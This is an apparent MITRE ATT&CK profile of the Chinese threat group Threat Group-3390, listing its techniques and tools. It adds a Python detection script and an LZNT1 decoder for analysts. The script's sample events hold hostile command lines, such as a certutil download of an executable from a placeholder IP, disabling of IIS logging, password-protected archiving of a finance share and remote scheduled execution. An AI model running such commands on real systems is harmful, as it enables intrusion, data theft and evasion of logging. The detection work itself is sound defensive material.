Threat Group-3390

Threat Group-3390 is a Chinese threat group that has extensively used strategic Web compromises to target victims.[1] The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.[2][3][4]

ID: G0027
Associated Groups: Earth Smilodon, TG-3390, Emissary Panda, BRONZE UNION, APT27, Iron Tiger, LuckyMouse
Contributors: Daniyal Naeem, BT Security; Kyaw Pyiyt Htet, @KyawPyiytHtet
Version: 2.2
Created: 31 May 2017
Last Modified: 10 April 2024

Associated Group Descriptions

Name Description
Earth Smilodon [5]
TG-3390 [1][6][7]
Emissary Panda [8][6][3][7][9][5]
BRONZE UNION [2][6]
APT27 [6][3][7][5]
Iron Tiger [7][5]
LuckyMouse [3][7][5]

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows Management Instrumentation

A Threat Group-3390 tool can use WMI to execute a binary.[6]

Enterprise T1555 .005 Credentials from Password Stores: Password Managers

Threat Group-3390 obtained a KeePass database from a compromised host.[4]

Enterprise T1005 Data from Local System

Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.[2]

Enterprise T1195 .002 Supply Chain Compromise: Compromise Software Supply Chain

Threat Group-3390 has compromised the Able Desktop installer to gain access to victims' environments.[5]

Enterprise T1199 Trusted Relationship

Threat Group-3390 has compromised third-party service providers to gain access to victims' environments.[10]

Enterprise T1112 Modify Registry

A Threat Group-3390 tool has created new Registry keys under HKEY_CURRENT_USER\Software\Classes\ and HKLM\SYSTEM\CurrentControlSet\services.[6][5]

Enterprise T1543 .003 Create or Modify System Process: Windows Service

Threat Group-3390's malware can create a new service, sometimes naming it after the config information, to gain persistence.[6][11]

Enterprise T1190 Exploit Public-Facing Application

Threat Group-3390 has exploited CVE-2019-0604 in Microsoft SharePoint, and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Microsoft Exchange Server.[5]

Enterprise T1574 .001 Hijack Execution Flow: DLL Search Order Hijacking

Threat Group-3390 has performed DLL search order hijacking to execute their payload.[6]

.002 Hijack Execution Flow: DLL Side-Loading

Threat Group-3390 has used DLL side-loading, including by using legitimate Kaspersky antivirus variants as well as rc.exe, a legitimate Microsoft Resource Compiler.[1][2][3][9][11]

Enterprise T1140 Deobfuscate/Decode Files or Information

During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.[3]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Threat Group-3390's malware can add a Registry key to Software\Microsoft\Windows\CurrentVersion\Run for persistence.[6][11]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Threat Group-3390 has used PowerShell for execution.[2][4]

.003 Command and Scripting Interpreter: Windows Command Shell

Threat Group-3390 has used command-line interfaces for execution.[2][9]

Enterprise T1133 External Remote Services

Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services.[1] Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.[2]

Enterprise T1562 .002 Impair Defenses: Disable Windows Event Logging

Threat Group-3390 has used appcmd.exe to disable logging on a victim server.[2]

Enterprise T1203 Exploitation for Client Execution

Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor.[5]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Threat Group-3390 malware has used HTTP for C2.[3]

Enterprise T1560 .002 Archive Collected Data: Archive via Library

Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration.[2]

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

Threat Group-3390 actors have used a modified version of Mimikatz called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers.[1][2]

.002 OS Credential Dumping: Security Account Manager

Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.[1][2]

.004 OS Credential Dumping: LSA Secrets

Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.[1][2]

Enterprise T1030 Data Transfer Size Limits

Threat Group-3390 actors have split RAR archives into multiple parts for exfiltration.[1]

Enterprise T1074 .001 Data Staged: Local Data Staging

Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts.[2]

.002 Data Staged: Remote Data Staging

Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration.[2]

Enterprise T1608 .001 Stage Capabilities: Upload Malware

Threat Group-3390 has hosted malicious payloads on Dropbox.[4]

.002 Stage Capabilities: Upload Tool

Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites.[1]

.004 Stage Capabilities: Drive-by Target

Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.[8]

Enterprise T1078 Valid Accounts

Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.[1]

Enterprise T1505 .003 Server Software Component: Web Shell

Threat Group-3390 has used a variety of Web shells.[9]

Enterprise T1068 Exploitation for Privilege Escalation

Threat Group-3390 has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges.[2][10]

Enterprise T1012 Query Registry

A Threat Group-3390 tool can read and decrypt stored Registry values.[6]

Enterprise T1189 Drive-by Compromise

Threat Group-3390 has extensively used strategic web compromises to target victims.[1][3]

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

Threat Group-3390 has packed malware and tools, including using VMProtect.[4][5]

.013 Obfuscated Files or Information: Encrypted/Encoded File

A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.[6][3][9]

Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges.[6]

Enterprise T1204 .002 User Execution: Malicious File

Threat Group-3390 has lured victims into opening malicious files containing malware.[4]

Enterprise T1070 .004 Indicator Removal: File Deletion

Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim.[2][4]

.005 Indicator Removal: Network Share Connection Removal

Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection.[2]

Enterprise T1033 System Owner/User Discovery

Threat Group-3390 has used whoami to collect system user information.[4]

Enterprise T1049 System Network Connections Discovery

Threat Group-3390 has used net use and netstat to conduct internal discovery of systems. The group has also used quser.exe to identify existing RDP sessions on a victim.[2]

Enterprise T1016 System Network Configuration Discovery

Threat Group-3390 actors use NBTscan to discover vulnerable systems.[1]

Enterprise T1046 Network Service Discovery

Threat Group-3390 actors use the Hunter tool to conduct network service discovery for vulnerable systems.[1][9]

Enterprise T1119 Automated Collection

Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.[2]

Enterprise T1583 .001 Acquire Infrastructure: Domains

Threat Group-3390 has registered domains for C2.[11]

Enterprise T1588 .002 Obtain Capabilities: Tool

Threat Group-3390 has obtained and used tools such as Impacket, pwdump, Mimikatz, gsecdump, NBTscan, and Windows Credential Editor.[9][1]

.003 Obtain Capabilities: Code Signing Certificates

Threat Group-3390 has obtained stolen valid certificates, including from VMProtect and the Chinese instant messaging application Youdu, for their operations.[11]

Enterprise T1087 .001 Account Discovery: Local Account

Threat Group-3390 has used net user to conduct internal discovery of systems.[2]

Enterprise T1105 Ingress Tool Transfer

Threat Group-3390 has downloaded additional malware and tools onto compromised hosts, including by using certutil.[1][4]

Enterprise T1056 .001 Input Capture: Keylogging

Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.[1][7][3]

Enterprise T1055 .012 Process Injection: Process Hollowing

A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process.[6][3]

Enterprise T1021 .006 Remote Services: Windows Remote Management

Threat Group-3390 has used WinRM to enable remote execution.[2]

Enterprise T1210 Exploitation of Remote Services

Threat Group-3390 has exploited MS17-010 to move laterally to other systems on the network.[9]

Enterprise T1018 Remote System Discovery

Threat Group-3390 has used the net view command.[6]

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Threat Group-3390 has exfiltrated stolen data to Dropbox.[4]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

Threat Group-3390 has used e-mail to deliver malicious attachments to victims.[4]

Enterprise T1053 .002 Scheduled Task/Job: At

Threat Group-3390 actors use at to schedule tasks that run self-extracting RAR archives, which install HTTPBrowser or PlugX on other systems in a victim network.[1]
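Most of the hands-on-keyboard activity listed in the table above (whoami, net user, netstat, quser, certutil -urlcache downloads, appcmd.exe disabling IIS logging, at-scheduled jobs, split and password-protected RAR volumes, net use /delete after exfiltration) leaves nothing more exotic than a Windows process-creation event. The script below is an added example written for this page, not MITRE content and not Threat Group-3390 tooling: it runs a small rule set over constructed Sysmon EventID 1 / Security 4688-style events, records one hit per matched technique, and additionally flags a burst of three or more distinct discovery techniques from the same host and user inside a ten-minute window, which is how a web-shell-driven sweep looks next to an administrator running a single command. The event field names, the sample events (including the documentation-range IP address) and the burst thresholds are assumptions chosen for illustration.

```python
"""Triage Windows process-creation events for the command-line tradecraft
attributed to Threat Group-3390 (added example; rules and sample data are
constructed for illustration, not taken from the cited reporting)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Techniques whose hits count toward a "discovery burst".
DISCOVERY = {"T1087.001", "T1018", "T1049", "T1033", "T1016"}

# (technique, label, pattern); patterns run case-insensitively over the whole command line.
RULES = [
    ("T1033", "whoami", r"\bwhoami(?:\.exe)?\b"),
    ("T1087.001", "net user", r"\bnet1?(?:\.exe)?\s+user\b"),
    ("T1018", "net view", r"\bnet1?(?:\.exe)?\s+view\b"),
    ("T1049", "net use / netstat / quser",
     r"\bnet1?(?:\.exe)?\s+use\b(?!.*/del)|\bnetstat(?:\.exe)?\b|\bquser(?:\.exe)?\b"),
    ("T1016", "nbtscan / ipconfig", r"\bnbtscan(?:\.exe)?\b|\bipconfig(?:\.exe)?\b"),
    ("T1105", "certutil URL download", r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*\bhttps?://"),
    ("T1562.002", "appcmd disables IIS logging",
     r"\bappcmd(?:\.exe)?\b.*\bset\b.*(?:/dontLog:\s*true|logFile\.enabled:\s*false)"),
    ("T1053.002", "at.exe schedules a job",
     r"(?:^|[\\\s])at(?:\.exe)?\s+(?:\\\\\S+\s+)?\d{1,2}:\d{2}\b"),
    ("T1560.002", "rar split archive (-v), see also T1030", r"\brar(?:\.exe)?\s+a\b.*\s-v\d+[kmg]?\b"),
    ("T1070.005", "net use /delete", r"\bnet1?(?:\.exe)?\s+use\s+\S+\s+/del(?:ete)?\b"),
]
COMPILED = [(tech, label, re.compile(pat, re.I)) for tech, label, pat in RULES]

# Constructed sample events (not real telemetry), reduced to the fields the rules need.
SAMPLE_EVENTS = [
    {"ts": "2024-04-10T09:00:05", "host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": "w3wp.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2024-04-10T09:00:40", "host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": "w3wp.exe", "cmdline": "cmd.exe /c net user"},
    {"ts": "2024-04-10T09:01:10", "host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": "w3wp.exe", "cmdline": "cmd.exe /c netstat -ano"},
    {"ts": "2024-04-10T09:01:30", "host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": "w3wp.exe", "cmdline": "cmd.exe /c quser"},
    {"ts": "2024-04-10T09:03:00", "host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": "w3wp.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/u.txt C:\\Windows\\Temp\\u.exe"},
    {"ts": "2024-04-10T09:05:00", "host": "WEB01", "user": "NT AUTHORITY\\SYSTEM", "parent": "cmd.exe",
     "cmdline": "C:\\Windows\\System32\\inetsrv\\appcmd.exe set config /section:httpLogging /dontLog:True"},
    {"ts": "2024-04-10T23:10:00", "host": "FS02", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": "rar.exe a -hpS3cret! -v100m C:\\Users\\Public\\w.rar C:\\Share\\Finance"},
    {"ts": "2024-04-10T23:40:00", "host": "FS02", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": "net use \\\\WEB01\\C$ /delete"},
    {"ts": "2024-04-10T23:45:00", "host": "FS02", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": "at \\\\FS03 02:00 C:\\Windows\\Temp\\update.exe"},
    # Routine admin activity: a single discovery command, no burst expected.
    {"ts": "2024-04-10T14:00:00", "host": "ADMIN01", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "cmdline": "ipconfig /all"},
]


def match_rules(cmdline):
    """Return the (technique, label) pairs whose pattern matches one command line."""
    return [(tech, label) for tech, label, rx in COMPILED if rx.search(cmdline)]


def triage(events, window_s=600, min_distinct=3):
    """Per-event technique hits plus per-(host, user) discovery bursts."""
    hits, discovery_by_actor = [], defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):   # ISO timestamps sort lexically
        for tech, label in match_rules(ev["cmdline"]):
            hits.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                         "technique": tech, "label": label, "cmdline": ev["cmdline"]})
            if tech in DISCOVERY:
                discovery_by_actor[(ev["host"], ev["user"])].append(
                    (datetime.fromisoformat(ev["ts"]), tech))
    bursts = []
    for (host, user), seq in discovery_by_actor.items():
        for i, (t0, _) in enumerate(seq):           # sliding window over the sorted sequence
            techs = {t for ts, t in seq[i:] if ts - t0 <= timedelta(seconds=window_s)}
            if len(techs) >= min_distinct:
                bursts.append({"host": host, "user": user, "start": t0.isoformat(),
                               "techniques": sorted(techs)})
                break                                # one burst record per actor is enough
    return {"hits": hits, "bursts": bursts}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for h in result["hits"]:
        print(f'{h["ts"]} {h["host"]:8} {h["technique"]:10} {h["label"]}: {h["cmdline"]}')
    for b in result["bursts"]:
        print(f'BURST {b["host"]} {b["user"]} from {b["start"]}: {", ".join(b["techniques"])}')
```

In production the same patterns would live in the SIEM's query language; the part worth keeping is the pairing of a per-command rule with a short-window burst condition keyed on host and user, and the parent-process field, which this sample only carries as context: w3wp.exe spawning cmd.exe is the web-shell signal that makes the WEB01 sequence worth paging on.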

Software

ID Name References Techniques
S0073 ASPXSpy Threat Group-3390 has used a modified version of ASPXSpy called ASPXTool.[1][10] Server Software Component: Web Shell
S0160 certutil [4] Deobfuscate/Decode Files or Information, Archive Collected Data: Archive via Utility, Ingress Tool Transfer, Subvert Trust Controls: Install Root Certificate
S0020 China Chopper [1][2][6][9] Data from Local System, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: Web Protocols, File and Directory Discovery, Brute Force: Password Guessing, Server Software Component: Web Shell, Obfuscated Files or Information: Software Packing, Indicator Removal: Timestomp, Network Service Discovery, Ingress Tool Transfer
S0660 Clambling [4][10][5] Data from Local System, Modify Registry, Create or Modify System Process: Windows Service, Clipboard Data, Hijack Execution Flow: DLL Side-Loading, Deobfuscate/Decode Files or Information, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: PowerShell, Screen Capture, Application Layer Protocol, Application Layer Protocol: Web Protocols, File and Directory Discovery, Query Registry, Obfuscated Files or Information, Abuse Elevation Control Mechanism: Bypass User Account Control, User Execution: Malicious File, System Information Discovery, System Owner/User Discovery, System Time Discovery, System Services: Service Execution, System Network Configuration Discovery, Network Share Discovery, Web Service: Bidirectional Communication, Virtualization/Sandbox Evasion: Time Based Evasion, Video Capture, Input Capture: Keylogging, Process Discovery, Process Injection, Process Injection: Process Hollowing, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Phishing: Spearphishing Attachment, Hide Artifacts: Hidden Files and Directories, Non-Application Layer Protocol
S0154 Cobalt Strike [4] BITS Jobs, Windows Management Instrumentation, Data from Local System, Proxy: Domain Fronting, Proxy: Internal Proxy, Use Alternate Authentication Material: Pass the Hash, Modify Registry, Create or Modify System Process: Windows Service, Office Application Startup: Office Template Macros, Encrypted Channel: Asymmetric Cryptography, Encrypted Channel: Symmetric Cryptography, Protocol Tunneling, Reflective Code Loading, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: JavaScript, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Python, Command and Scripting Interpreter: Windows Command Shell, Impair Defenses: Disable or Modify Tools, Exploitation for Client Execution, Screen Capture, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Application Layer Protocol: File Transfer Protocols, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Security Account Manager, Data Transfer Size Limits, Data Obfuscation: Protocol or Service Impersonation, Data Encoding: Standard Encoding, File and Directory Discovery, Valid Accounts: Domain Accounts, Valid Accounts: Local Accounts, Native API, Exploitation for Privilege Escalation, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Query Registry, Browser Session Hijacking, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information, Abuse Elevation Control Mechanism: Sudo and Sudo Caching, Abuse Elevation Control Mechanism: Bypass User Account Control, Indicator Removal: Timestomp, System Binary Proxy Execution: Rundll32, System Services: Service Execution, System Service Discovery, System Network Connections Discovery, System Network Configuration Discovery, Network Share Discovery, Network Service Discovery, Access Token Manipulation: Parent PID Spoofing, Access Token Manipulation: Token Impersonation/Theft, Access Token Manipulation: Make and Impersonate Token, Account Discovery: Domain Account, Software Discovery, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Process Injection: Dynamic-link Library Injection, Process Injection: Process Hollowing, Process Injection, Remote Services: Remote Desktop Protocol, Remote Services: SSH, Remote Services: Windows Remote Management, Remote Services: SMB/Windows Admin Shares, Remote Services: Distributed Component Object Model, Remote System Discovery, Hide Artifacts: Process Argument Spoofing, Non-Application Layer Protocol, Scheduled Transfer, Subvert Trust Controls: Code Signing
S0032 gh0st RAT [12] Modify Registry, Shared Modules, Create or Modify System Process: Windows Service, Encrypted Channel: Symmetric Cryptography, Encrypted Channel, Dynamic Resolution: Fast Flux DNS, Hijack Execution Flow: DLL Side-Loading, Deobfuscate/Decode Files or Information, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter, Screen Capture, Data Encoding: Standard Encoding, Native API, Query Registry, Indicator Removal: Clear Windows Event Logs, Indicator Removal: File Deletion, System Binary Proxy Execution: Rundll32, System Information Discovery, System Services: Service Execution, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Process Injection, Non-Application Layer Protocol
S0008 gsecdump [1] OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSA Secrets
S0070 HTTPBrowser [1][2][6][5] Masquerading: Match Legitimate Name or Location, Hijack Execution Flow: DLL Search Order Hijacking, Hijack Execution Flow: DLL Side-Loading, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, File and Directory Discovery, Obfuscated Files or Information, Indicator Removal: File Deletion, Ingress Tool Transfer, Input Capture: Keylogging
S0398 HyperBro [9][3][7][4][5] Hijack Execution Flow: DLL Side-Loading, Deobfuscate/Decode Files or Information, Screen Capture, Application Layer Protocol: Web Protocols, Native API, Obfuscated Files or Information: Software Packing, Obfuscated Files or Information: Encrypted/Encoded File, Indicator Removal: File Deletion, System Services: Service Execution, System Service Discovery, Ingress Tool Transfer, Process Injection
S0357 Impacket [9] Windows Management Instrumentation, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, OS Credential Dumping: NTDS, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSA Secrets, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Ccache Files, System Services: Service Execution, Network Sniffing
S0100 ipconfig [2] System Network Configuration Discovery
S0002 Mimikatz Threat Group-3390 has used a modified version of Mimikatz called Wrapikatz.[2][6][4][13][10] Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores: Windows Credential Manager, Rogue Domain Controller, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket, Boot or Logon Autostart Execution: Security Support Provider, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, Unsecured Credentials: Private Keys, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, Steal or Forge Authentication Certificates, Access Token Manipulation: SID-History Injection, Account Manipulation
S0590 NBTscan [1][4] System Owner/User Discovery, System Network Configuration Discovery, Network Sniffing, Network Service Discovery, Remote System Discovery
S0039 Net [2] Create Account: Local Account, Create Account: Domain Account, Password Policy Discovery, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Indicator Removal: Network Share Connection Removal, System Time Discovery, System Services: Service Execution, System Service Discovery, System Network Connections Discovery, Network Share Discovery, Account Discovery: Domain Account, Account Discovery: Local Account, Account Manipulation: Additional Local or Domain Groups, Remote Services: SMB/Windows Admin Shares, Remote System Discovery
S0104 netstat [4] System Network Connections Discovery
S0664 Pandora [5] Modify Registry, Create or Modify System Process: Windows Service, Encrypted Channel: Symmetric Cryptography, Hijack Execution Flow: DLL Side-Loading, Application Layer Protocol: Web Protocols, Exploitation for Privilege Escalation, Traffic Signaling, Obfuscated Files or Information, System Services: Service Execution, Ingress Tool Transfer, Process Discovery, Process Injection, Subvert Trust Controls: Code Signing Policy Modification
S0013 PlugX [1][2][6][4][10] Masquerading: Masquerade Task or Service, Masquerading: Match Legitimate Name or Location, Modify Registry, Create or Modify System Process: Windows Service, Encrypted Channel: Symmetric Cryptography, Hijack Execution Flow: DLL Side-Loading, Hijack Execution Flow: DLL Search Order Hijacking, Deobfuscate/Decode Files or Information, Trusted Developer Utilities Proxy Execution: MSBuild, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Screen Capture, Application Layer Protocol: Web Protocols, Application Layer Protocol: DNS, File and Directory Discovery, Native API, Query Registry, Obfuscated Files or Information, System Network Connections Discovery, Network Share Discovery, Web Service: Dead Drop Resolver, Virtualization/Sandbox Evasion: System Checks, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Hide Artifacts: Hidden Files and Directories, Non-Application Layer Protocol
S0006 pwdump [9] OS Credential Dumping: Security Account Manager
S0662 RCSession [5][4][10] Data from Local System, Masquerading, Modify Registry, Encrypted Channel, Hijack Execution Flow: DLL Side-Loading, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Screen Capture, Application Layer Protocol: Web Protocols, Native API, Obfuscated Files or Information: Encrypted/Encoded File, Obfuscated Files or Information: Fileless Storage, Abuse Elevation Control Mechanism: Bypass User Account Control, Indicator Removal: File Deletion, System Binary Proxy Execution: Msiexec, System Information Discovery, System Owner/User Discovery, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Process Injection: Process Hollowing, Non-Application Layer Protocol
S0096 Systeminfo [4] System Information Discovery
S0663 SysUpdate [5] Windows Management Instrumentation, Data from Local System, Masquerading: Masquerade Task or Service, Modify Registry, Create or Modify System Process: Systemd Service, Create or Modify System Process: Windows Service, Encrypted Channel: Symmetric Cryptography, Hijack Execution Flow: DLL Side-Loading, Deobfuscate/Decode Files or Information, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Screen Capture, Application Layer Protocol: DNS, Data Encoding: Standard Encoding, File and Directory Discovery, Native API, Obfuscated Files or Information: Fileless Storage, Obfuscated Files or Information: Encrypted/Encoded File, Obfuscated Files or Information: Software Packing, Indicator Removal: File Deletion, System Information Discovery, System Owner/User Discovery, System Services: Service Execution, System Service Discovery, System Network Configuration Discovery: Internet Connection Discovery, System Network Configuration Discovery, Ingress Tool Transfer, Process Discovery, Exfiltration Over C2 Channel, Hide Artifacts: Hidden Files and Directories, Subvert Trust Controls: Code Signing
S0057 Tasklist [4] System Service Discovery, Software Discovery: Security Software Discovery, Process Discovery
S0005 Windows Credential Editor [1] OS Credential Dumping: LSASS Memory
S0412 ZxShell [12] Data from Local System, Proxy, Modify Registry, Create or Modify System Process: Windows Service, Create Account: Local Account, Exploit Public-Facing Application, Command and Scripting Interpreter: Windows Command Shell, Impair Defenses: Disable or Modify System Firewall, Impair Defenses: Disable or Modify Tools, Screen Capture, Application Layer Protocol: Web Protocols, Application Layer Protocol: File Transfer Protocols, File and Directory Discovery, Native API, Query Registry, Indicator Removal: Clear Windows Event Logs, Indicator Removal: File Deletion, System Binary Proxy Execution: Rundll32, System Information Discovery, System Owner/User Discovery, System Services: Service Execution, System Service Discovery, Endpoint Denial of Service, Network Service Discovery, Video Capture, Access Token Manipulation: Create Process with Token, Ingress Tool Transfer, Input Capture: Credential API Hooking, Input Capture: Keylogging, Process Discovery, Process Injection: Dynamic-link Library Injection, Remote Services: VNC, Remote Services: Remote Desktop Protocol, Non-Standard Port
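The T1140 and T1027.013 entries above record that the group's malware (HyperBro in the cited reporting) carries a payload that was shikata_ga_nai-encoded and then LZNT1-compressed. LZNT1 is the format behind RtlCompressBuffer and RtlDecompressBuffer, so an analyst unpacking a dumped blob off a Windows box needs a portable decoder. The module below is an added example written for this page, not code from the group's tooling or from MITRE: it implements the LZNT1 chunk and token layout from the MS-XCA specification in both directions, so a decode can be checked by round-tripping and a compressed region can be recognised by the chunk-header signature. The test vector is constructed. The shikata_ga_nai stage is deliberately not covered: that stub is polymorphic per sample and is recovered by running or emulating it, not by a fixed decoder.

```python
"""Portable LZNT1 compressor/decompressor (MS-XCA chunk/token layout).
Added example for off-box unpacking; the test vector is constructed."""

CHUNK = 4096  # maximum uncompressed bytes per LZNT1 chunk


def _split(written):
    """Bit split of a 16-bit back-reference token after `written` bytes of the
    current chunk: 4-bit displacement / 12-bit length at the start of a chunk,
    one bit moves from length to displacement each time the position doubles past 16."""
    len_mask, disp_shift = 0xFFF, 12
    p = written - 1
    while p >= 0x10:
        p >>= 1
        len_mask >>= 1
        disp_shift -= 1
    return len_mask, disp_shift


def _decompress_chunk(chunk):
    out = bytearray()
    i = 0
    while i < len(chunk):
        flags = chunk[i]; i += 1              # one flag byte covers the next 8 tokens
        for bit in range(8):
            if i >= len(chunk):
                break
            if not (flags >> bit) & 1:        # clear bit: literal byte
                out.append(chunk[i]); i += 1
                continue
            if i + 1 >= len(chunk):
                raise ValueError("truncated back-reference token")
            token = chunk[i] | (chunk[i + 1] << 8); i += 2
            len_mask, disp_shift = _split(len(out))
            length = (token & len_mask) + 3
            disp = (token >> disp_shift) + 1
            if disp > len(out):
                raise ValueError("back-reference points before chunk start")
            for _ in range(length):           # byte-wise copy so overlapping runs work
                out.append(out[-disp])
    return bytes(out)


def lznt1_decompress(buf):
    out = bytearray()
    i = 0
    while i + 2 <= len(buf):
        hdr = buf[i] | (buf[i + 1] << 8); i += 2
        if hdr == 0:                          # zero header terminates the stream
            break
        size = (hdr & 0xFFF) + 1              # low 12 bits: chunk body size - 1
        if i + size > len(buf):
            raise ValueError("truncated chunk")
        body = buf[i:i + size]; i += size
        out += _decompress_chunk(body) if hdr & 0x8000 else body   # bit 15: compressed
    return bytes(out)


def _compress_chunk(data):
    out = bytearray()
    pos = 0
    while pos < len(data):
        flags, tokens = 0, bytearray()
        for bit in range(8):
            if pos >= len(data):
                break
            len_mask, disp_shift = _split(pos)
            max_len, max_disp = len_mask + 3, (0xFFFF >> disp_shift) + 1
            best_len = best_disp = 0
            for disp in range(1, min(pos, max_disp) + 1):   # greedy longest match
                n = 0
                while n < max_len and pos + n < len(data) and data[pos + n] == data[pos + n - disp]:
                    n += 1
                if n > best_len:
                    best_len, best_disp = n, disp
            if best_len >= 3:
                flags |= 1 << bit
                tokens += (((best_disp - 1) << disp_shift) | (best_len - 3)).to_bytes(2, "little")
                pos += best_len
            else:
                tokens.append(data[pos]); pos += 1
        out.append(flags); out += tokens
    return bytes(out)


def lznt1_compress(data):
    out = bytearray()
    for start in range(0, len(data), CHUNK):
        chunk = data[start:start + CHUNK]
        body, flag = _compress_chunk(chunk), 0x8000
        if len(body) >= len(chunk):           # store raw when compression does not pay off
            body, flag = chunk, 0
        out += (flag | 0x3000 | (len(body) - 1)).to_bytes(2, "little") + body   # 0x3000: signature bits
    return bytes(out)


# Constructed vector: one compressed chunk holding literals "ABCD" then a back-reference
# (displacement 4, length 8), which expands to b"ABCDABCDABCD".
SAMPLE_BLOB = bytes.fromhex("06b010414243440530")

if __name__ == "__main__":
    print(lznt1_decompress(SAMPLE_BLOB))
```

Two practical notes. A blob that is still XOR-encrypted or truncated will usually fail the displacement or length checks rather than decode to plausible bytes, so a ValueError is a useful signal that another layer sits in front of LZNT1. Chunks are independent, so a stream with a corrupted tail still yields every chunk before the damage if the loop is wrapped to catch per-chunk errors.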

References